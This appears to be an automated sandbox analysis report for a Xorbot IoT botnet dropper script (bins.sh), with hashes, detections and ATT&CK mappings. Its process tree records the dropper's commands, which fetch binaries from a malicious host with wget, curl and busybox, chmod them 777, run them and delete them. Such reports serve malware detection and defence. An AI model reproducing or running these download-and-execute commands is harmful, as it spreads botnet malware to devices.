xorbot | 9faabe01ff89b4a68e68ac5fded815e7a1574057482f7ed301b94feb9cbb1e52

Analysis

max time kernel
137s
max time network
141s
platform
debian-9_mipsel
resource
debian9-mipsel-20240226-en
resource tags

arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
11/12/2024, 02:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

c3f019a7352fe8f83f6e1dc7cfe4cc11
SHA1

46878d89421696772fb817f1ab2c3da137b30002
SHA256

9faabe01ff89b4a68e68ac5fded815e7a1574057482f7ed301b94feb9cbb1e52
SHA512

f1ba2cce684b38f648a4ef5e5a92ab414b7d8687d4da0be9dd658cef9527fb8516db95955aa56c9e138a274d00362250a387d85fbe4576713debc0c6cbecf58e
SSDEEP

96:YlFpLokYL6yQMrMHMJ9GWeDEDIDD+WBLvDHNNNNNuF5jL990LDfBVrVHVGXHlUjg:p4y8HJ1GXHlTwg01o0J1GXHDwgs1E

Score

10^/10

xorbot botnet defense_evasion discovery trojan

Malware Config

Signatures

Detects Xorbot 3 IoCs

botnet trojan

resource	yara_rule
behavioral4/files/fstream-1.dat	family_xorbot
behavioral4/files/fstream-3.dat	family_xorbot
behavioral4/files/fstream-5.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot

File and Directory Permissions Modification 1 TTPs 2 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
808	chmod
767	chmod

Executes dropped EXE 2 IoCs

ioc	pid	Process
/tmp/KGtLzINmZY4aCKpq1VnoAaFNo3EDcw4DBL	768	KGtLzINmZY4aCKpq1VnoAaFNo3EDcw4DBL
/tmp/5YLNvCLIx3rjUO1nLrd4RLbDA1Pltj1A4E	809	5YLNvCLIx3rjUO1nLrd4RLbDA1Pltj1A4E

Reads runtime system information 3 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 9 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
812	wget
813	curl
712	curl
771	wget
805	curl
807	busybox
815	busybox
697	wget
759	busybox

Writes file to tmp directory 7 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/KGtLzINmZY4aCKpq1VnoAaFNo3EDcw4DBL	busybox
File opened for modification	/tmp/5YLNvCLIx3rjUO1nLrd4RLbDA1Pltj1A4E	wget
File opened for modification	/tmp/5YLNvCLIx3rjUO1nLrd4RLbDA1Pltj1A4E	curl
File opened for modification	/tmp/5YLNvCLIx3rjUO1nLrd4RLbDA1Pltj1A4E	busybox
File opened for modification	/tmp/iulNWL0SSCelWP1rm6tCCTZVBfkpKuD3S2	wget
File opened for modification	/tmp/KGtLzINmZY4aCKpq1VnoAaFNo3EDcw4DBL	wget
File opened for modification	/tmp/KGtLzINmZY4aCKpq1VnoAaFNo3EDcw4DBL	curl

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:690
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:693
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/KGtLzINmZY4aCKpq1VnoAaFNo3EDcw4DBL
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:697
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/KGtLzINmZY4aCKpq1VnoAaFNo3EDcw4DBL
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:712
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/KGtLzINmZY4aCKpq1VnoAaFNo3EDcw4DBL
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:759
- /bin/chmod
  chmod 777 KGtLzINmZY4aCKpq1VnoAaFNo3EDcw4DBL
  2⤵
  - File and Directory Permissions Modification
  PID:767
- /tmp/KGtLzINmZY4aCKpq1VnoAaFNo3EDcw4DBL
  ./KGtLzINmZY4aCKpq1VnoAaFNo3EDcw4DBL
  2⤵
  - Executes dropped EXE
  PID:768
- /bin/rm
  rm KGtLzINmZY4aCKpq1VnoAaFNo3EDcw4DBL
  2⤵
  PID:770
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/5YLNvCLIx3rjUO1nLrd4RLbDA1Pltj1A4E
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:771
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/5YLNvCLIx3rjUO1nLrd4RLbDA1Pltj1A4E
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:805
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/5YLNvCLIx3rjUO1nLrd4RLbDA1Pltj1A4E
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:807
- /bin/chmod
  chmod 777 5YLNvCLIx3rjUO1nLrd4RLbDA1Pltj1A4E
  2⤵
  - File and Directory Permissions Modification
  PID:808
- /tmp/5YLNvCLIx3rjUO1nLrd4RLbDA1Pltj1A4E
  ./5YLNvCLIx3rjUO1nLrd4RLbDA1Pltj1A4E
  2⤵
  - Executes dropped EXE
  PID:809
- /bin/rm
  rm 5YLNvCLIx3rjUO1nLrd4RLbDA1Pltj1A4E
  2⤵
  PID:811
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/iulNWL0SSCelWP1rm6tCCTZVBfkpKuD3S2
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:812
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/iulNWL0SSCelWP1rm6tCCTZVBfkpKuD3S2
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  PID:813
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/iulNWL0SSCelWP1rm6tCCTZVBfkpKuD3S2
  2⤵
  - System Network Configuration Discovery
  PID:815

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/5YLNvCLIx3rjUO1nLrd4RLbDA1Pltj1A4E

Filesize
141KB

MD5
3ca8decdb1e52c423c521bfff02ac200

SHA1
8621ecd6807109b8541912ad9e134f6fb49bfd48

SHA256
dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

SHA512
b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

Download Submit
/tmp/KGtLzINmZY4aCKpq1VnoAaFNo3EDcw4DBL

Filesize
99KB

MD5
9438d9bc392bcf300a5583b6df5bc8f6

SHA1
375a6ae34b516f6f3eeea8030c4084f585017efa

SHA256
68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

SHA512
1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

Download Submit
/tmp/iulNWL0SSCelWP1rm6tCCTZVBfkpKuD3S2

Filesize
111KB

MD5
701e7a55a4f3650f5feee92a9860e5fc

SHA1
6ce4a7f0dc80fe557a0ace4de25e6305af221ed4

SHA256
ff851250b0bd7e6f2c445b08d858d840b554caf75a37ada2a970ea4d317ba588

SHA512
7352517b4af3b0cfe1cc814accf18e6254532f33dee274279bd499b6748aa0ed044c9429d6df0eb07ff0292cd0f9388ce44d278e0c562e6e57110b28a66a5f11

Download Submit